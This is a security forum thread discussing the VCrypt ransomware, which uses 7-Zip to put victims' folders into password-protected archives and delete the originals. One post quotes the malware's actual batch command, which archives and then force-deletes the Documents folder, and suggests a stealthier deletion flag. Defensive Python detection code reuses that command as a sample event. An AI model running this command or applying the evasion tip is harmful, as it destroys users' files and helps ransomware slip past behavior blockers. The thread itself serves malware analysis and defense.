New VCrypt Ransomware locks files in password-protected 7ZIPs

CyberTech

Level 33
Verified
Nov 10, 2017
2,214
A new ransomware called VCrypt is targeting French victims by utilizing the legitimate 7zip command-line program to create password-protected archives of data folders.

BleepingComputer was told today about a new ransomware that was deleting all of a victim's files found in Windows data folders and then creating new "encrypted" files named after the folder name.

These encrypted files would utilize a naming format of username_foldername.vxcrypt.

For example, the files in the Documents folder would be deleted, and a file named User_documents.vcrypt would be created, as shown in the image below.
 

MacDefender

Level 14
Verified
Oct 13, 2019
630
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.
 

MacDefender

Level 14
Verified
Oct 13, 2019
630
FWIW, luckily, this ransomware is very poorly and dumbly coded:

Code:
2480 - C:\Windows\system32\cmd.exe /c if exist %USERPROFILE%\Documents\ for /F %i in (dir /b "%USERPROFILE%\\Documents\\*.*") do %TEMP%\mod_01.exe a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS %USERPROFILE%\%username%_documents.vcrypt %USERPROFILE%\Documents\* & del /f /s /q %USERPROFILE%\Documents\ & FOR /D %p IN (%USERPROFILE%\Documents\*) do rmdir %p /s /q

It uses a batch file and the del command to delete the documents. If they wanted to be smart, they'd use the "-sdel" argument to 7za. Attempting to directly delete the user's documents without abusing a whitelisted process triggers most behavior blockers that are able to AMSI inspect batch files.
 
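The two points above (a behavior blocker should look at the whole chain and at what 7-Zip was told to do, not just at the trusted image name, and the quoted batch line that archives then deletes the Documents folder) can be turned into detection logic. The following is an added example, not code from the thread or from any AV product: it scores constructed Sysmon-style process-creation events (field names `Image`, `CommandLine`, `ParentImage`, `ParentCommandLine` are assumed) and only flags when several independent signals line up, so a user running the real `7z.exe` on their own Documents folder is not flagged.

```python
import re
import shlex
from os.path import basename

KNOWN_7ZIP_IMAGES = {"7z.exe", "7za.exe", "7zg.exe", "7zfm.exe"}
USER_DATA_DIRS = r"(?:Documents|Desktop|Pictures|Downloads|Videos|Music)"

# Constructed events (not real telemetry). The first mimics the VCrypt batch
# line quoted in the thread; the second is a benign backup with genuine 7z.exe.
EVENTS = [
    {"Image": r"C:\Users\User\AppData\Local\Temp\mod_01.exe",
     "CommandLine": r"C:\Users\User\AppData\Local\Temp\mod_01.exe a -t7z -r -mx0 "
                    r"-pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS "
                    r"C:\Users\User\User_documents.vcrypt C:\Users\User\Documents\*",
     "ParentImage": r"C:\Windows\system32\cmd.exe",
     "ParentCommandLine": r'C:\Windows\system32\cmd.exe /c if exist %USERPROFILE%\Documents\ for /F %i in '
                          r'(dir /b "%USERPROFILE%\\Documents\\*.*") do %TEMP%\mod_01.exe a -t7z -r -mx0 '
                          r'-pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS %USERPROFILE%\%username%_documents.vcrypt '
                          r'%USERPROFILE%\Documents\* & del /f /s /q %USERPROFILE%\Documents\ & '
                          r'FOR /D %p IN (%USERPROFILE%\Documents\*) do rmdir %p /s /q'},
    {"Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r'"C:\Program Files\7-Zip\7z.exe" a -t7z D:\backup\docs.7z C:\Users\User\Documents',
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
]

def archive_add_args(command_line):
    """Return argv if the line uses 7-Zip's 'a' (add) grammar, regardless of the binary's name."""
    try:
        argv = shlex.split(command_line, posix=False)  # keeps Windows backslashes intact
    except ValueError:
        return None
    if len(argv) < 3 or argv[1].lower() != "a":
        return None
    return argv if any(a.startswith(("-t", "-mx", "-p", "-r")) for a in argv[2:]) else None

def assess(event):
    """List the signals that make this event look like archive-based file locking."""
    argv = archive_add_args(event["CommandLine"])
    if argv is None:
        return []
    reasons = []
    image = basename(event["Image"].replace("\\", "/")).lower()
    if image not in KNOWN_7ZIP_IMAGES:        # renamed/dropped copy, e.g. %TEMP%\mod_01.exe
        reasons.append("7-Zip argument grammar from non-7-Zip image " + image)
    if any(re.fullmatch(r"-p\S+", a) for a in argv[2:]):
        reasons.append("archive protected with a password passed on the command line")
    if any(re.search(r"\\" + USER_DATA_DIRS + r"(?:\\\*?)?$", a, re.I) for a in argv[2:]):
        reasons.append("entire user data folder given as archive input")
    parent = event.get("ParentCommandLine", "")
    if re.search(r"\b(?:del|erase)\s+(?:/\w\s+)+\S*" + USER_DATA_DIRS, parent, re.I) \
            or re.search(r"\brmdir\b.*/s", parent, re.I):
        reasons.append("parent script deletes the archived folder after archiving")
    return reasons

def is_suspicious(event):
    """Require at least two signals so a plain user backup is not flagged."""
    return len(assess(event)) >= 2
```

Running `assess` over `EVENTS` yields four reasons for the VCrypt-style event and only one for the benign backup, which is the difference between inspecting the chain and whitelisting the process.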

SeriousHoax

Level 35
Verified
Mar 16, 2019
2,334
Tbh, looks like detecting this ransomware shouldn't even require a trigger from a behavior blocker because AVs with good signatures and heuristics should be able to detect it easily without any additional help. E.g. ESET's detection of this malware as "A Variant Of Win32/Filecoder.NTG".
 

geminis3

Level 18
Verified
Malware Tester
Sep 10, 2015
833

struppigel

Moderator
Verified
Staff member
Apr 9, 2020
297
> Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

> also written in C 🤔
> EDIT: looks like a cybercriminal recreated my PoC and removed the need for a local 7zip copy

The main code is a batch script.
 

MacDefender

Level 14
Verified
Oct 13, 2019
630
> Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

I believe it was ESET or maybe another vendor. Basically they brushed off the proof of concept as not realistic because users archive their files using 7Zip too, or something along those lines. Either way it was a fairly dismissive analysis of a real problem I was trying to demonstrate, which is a lot of behavior blockers turn a blind eye if you have a trusted process be the last agent to modify and delete your documents.
 

miguelang611

Level 2
Apr 13, 2020
72
> Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.
>
> I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.
>
> Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.

As an idea, maybe for people with AVs that can have different levels of restriction (Kaspersky has it, I guess other AVs do too), restrict 7z to accessing just one folder, like the Downloads folder. Then it would just encrypt that folder in case of attack o_O

Might not be perfect, but I guess it would do the job :unsure:
 